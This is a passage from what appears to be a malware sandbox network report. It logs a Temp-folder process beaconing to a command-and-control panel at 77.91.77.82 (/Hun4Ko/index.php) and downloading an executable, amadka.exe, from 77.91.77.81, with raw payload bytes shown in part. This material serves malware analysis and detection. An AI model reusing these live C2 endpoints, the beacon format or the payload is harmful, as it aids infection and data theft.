                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:21.447952032 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:21.671865940 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.44975277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:21.794718981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:22.506867886 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:22.509042025 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:22.729518890 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.44975377.91.77.81808076C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:22.348119974 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:23.057163000 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1850368
                                                                Last-Modified: Fri, 05 Jul 2024 01:34:22 GMT
                                                                Connection: keep-alive
                                                                ETag: "66874d9e-1c3c00"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELaf`I@I@Xl@I@I @.rsrc@.idata @ p)@ohmzqnep0 0$@ebipawojPI@.taggant0`I"@
                                                                Jul 5, 2024 04:23:23.057177067 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:23:23.057188034 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:23:23.057202101 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:23:23.057212114 CEST896INData Raw: 51 2b 67 72 fb ff b4 d7 e4 cf c1 08 74 2f d2 d0 ee 30 4e 46 5a c8 10 4d ec b7 3c 79 4d 2b 27 73 bb 8b de dd 3f 9f 82 72 e3 1c 3c c8 5c ff cb 75 e4 eb 76 75 bf 1e 0c 68 5c 5f 06 9e e8 ab 1e 85 2b 8b c2 6b b1 12 de 84 1b 97 55 bb 8a 0f 71 90 4b d7
                                                                Data Ascii: Q+grt/0NFZM<yM+'s?r<\uvuh\_+kUqKe00 -uLYr1NKu MMAvrhrMRv>Or{?r <LxK9jBeU31K~5FXsN@TuW&
                                                                Jul 5, 2024 04:23:23.057221889 CEST1236INData Raw: 24 68 2a 8d d7 b0 1e a8 73 9f 5d 74 c4 16 45 75 ab 2f 3a 11 aa 52 0d 85 11 38 95 d4 87 97 dd 20 3d fd e6 85 7b 4d de 9d 55 9f be c4 db 2f 0a d1 39 12 82 d2 1b 30 55 b2 4b cb fe 8c 4b e3 3c 28 8c 2d ee 2b 48 28 ea 88 1b 6d de 85 ef 34 dd 47 5c 7f
                                                                Data Ascii: $h*s]tEu/:R8 ={MU/90UKK<(-+H(m4G\}g-/N+/rO<LBjso4p:U+r{5R\Kh\W;]c;L}qu;L>O|<\4]s<A|:<
                                                                Jul 5, 2024 04:23:23.057287931 CEST1236INData Raw: cd 45 4d 0a 17 f7 39 4a 6a b5 c2 f3 dd 5d ea 82 d1 9f 3c 88 2c 90 3a 57 9c ab b5 80 4c 64 de d2 29 3b db 55 2c cf 0e 1d 5f 12 7f 4b d5 c6 4c a5 6d 5c 56 e7 31 c9 07 85 81 cd 7e fc 26 0a 22 66 7d de 25 97 09 32 f0 cd d3 b7 46 14 70 b3 0e 7d 7d 6e
                                                                Data Ascii: EM9Jj]<,:WLd);U,_KLm\V1~&"f}%2Fp}}nuW%'J-dLs\|>mZ;?iNV&G[sXzNV)k,Foyjrm>Al^izl4X_CPQg+Xbf,e)oXuLm
                                                                Jul 5, 2024 04:23:23.057298899 CEST1236INData Raw: e7 7a 8c d2 3a d9 75 0a 47 7f c0 a0 f1 af 33 1d 6b 5a 2f 94 fe 2b 71 34 3c 4f 0e 9b ec 8c 01 5c fb 5b 2a af 7b 27 b6 b4 bf 90 66 fa bc 25 68 5d 4f 56 95 28 9c 3f 56 b2 78 72 23 76 d9 5b 61 90 e6 13 f6 14 b8 5c 14 88 43 02 7e d0 95 18 4b 2d 29 96
                                                                Data Ascii: z:uG3kZ/+q4<O\[*{'f%h]OV(?Vxr#v[a\C~K-)H9X4Saq=eLyyQ!;L-'b[D3HWh+kA,r"qC(JY?gEo})Sq,du~BIkWmO+aAWO:
                                                                Jul 5, 2024 04:23:23.057308912 CEST1236INData Raw: 17 7b f6 64 6a 57 ee ec 33 79 0e 9e 5b 2e ec f4 f4 6c ae f9 ca dc aa 14 b3 a3 7b 3a 9c d5 ed bb 72 8d 49 31 14 87 4e fb c2 d9 fe 2b 5c a7 3f 5c ab ef bb ee 6e 3f 83 65 74 f0 ea 79 87 52 2d c8 ea d4 0a 98 1b 5c 1f 6e 12 09 e5 6c f3 fd 01 64 2b 04
                                                                Data Ascii: {djW3y[.l{:rI1N+\?\n?etyR-\nld+}n{^COgrGMVj#dcPY/r_\mbzyTzSv}Pe9lY3H^Os[k?fWztE,v80({x:
                                                                Jul 5, 2024 04:23:23.057320118 CEST328INData Raw: 0e 57 c4 55 9e 68 e8 ab 38 bd 9c d3 f5 f0 6f 76 29 44 ba 12 ae 8b 17 7a bc 3d d4 e8 1b 6f ff 11 23 68 ea a0 f6 1e 76 49 97 51 be 33 2d f5 02 94 f1 cd be 34 2d 9f 0a 85 1b d8 e4 93 24 8f bb 64 f3 01 1d c1 b3 5c d8 c6 ab dc e9 2b 48 7f de 11 52 3d
                                                                Data Ascii: WUh8ov)Dz=o#hvIQ3-4-$d\+HR=M?oZfl-@(#O,nS&W@JiCkmBSr8<uOxj}uXNHR76)<1l4[aIgFWH>r~B!
                                                                Jul 5, 2024 04:23:23.062141895 CEST1236INData Raw: 58 4f b9 f9 0a 35 19 62 70 3f 1f f5 87 54 32 dd 6b 00 41 f5 ea e8 0e a3 36 3f 5d ce ac a1 a6 96 4a fa fb 0c 3f 91 f0 e4 94 9f c1 3a c5 8f 4c fd 63 96 51 41 e5 14 4a 3e eb 81 01 d1 b3 b1 1c 0f 2c 1a 86 51 6d 6d a7 09 62 9e 53 fb d3 5f 69 c2 cc 83
                                                                Data Ascii: XO5bp?T2kA6?]J?:LcQAJ>,QmmbS_i5@N@X@L\Oii;K1JbG*!be~F|6GEXa0KL>Det[7jXS[t(@I2-b}7C!b


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.44975477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:22.843116045 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:23.572079897 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:23.572684050 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:23.905766964 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.44975577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:24.025455952 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:24.750513077 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:24.751831055 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:24.979038954 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.44975677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:25.119327068 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:25.840867043 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:25.841552973 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:26.063956022 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.44975977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:26.204622984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:26.919651985 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:26.920244932 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:27.962094069 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0
                                                                Jul 5, 2024 04:23:27.964034081 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0
                                                                Jul 5, 2024 04:23:27.965744019 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.44976177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:28.074341059 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:28.792445898 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:28.793112993 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:29.144792080 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.44976277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:29.260287046 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:29.972260952 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:29.972999096 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:30.194071054 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.44976477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:30.306853056 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
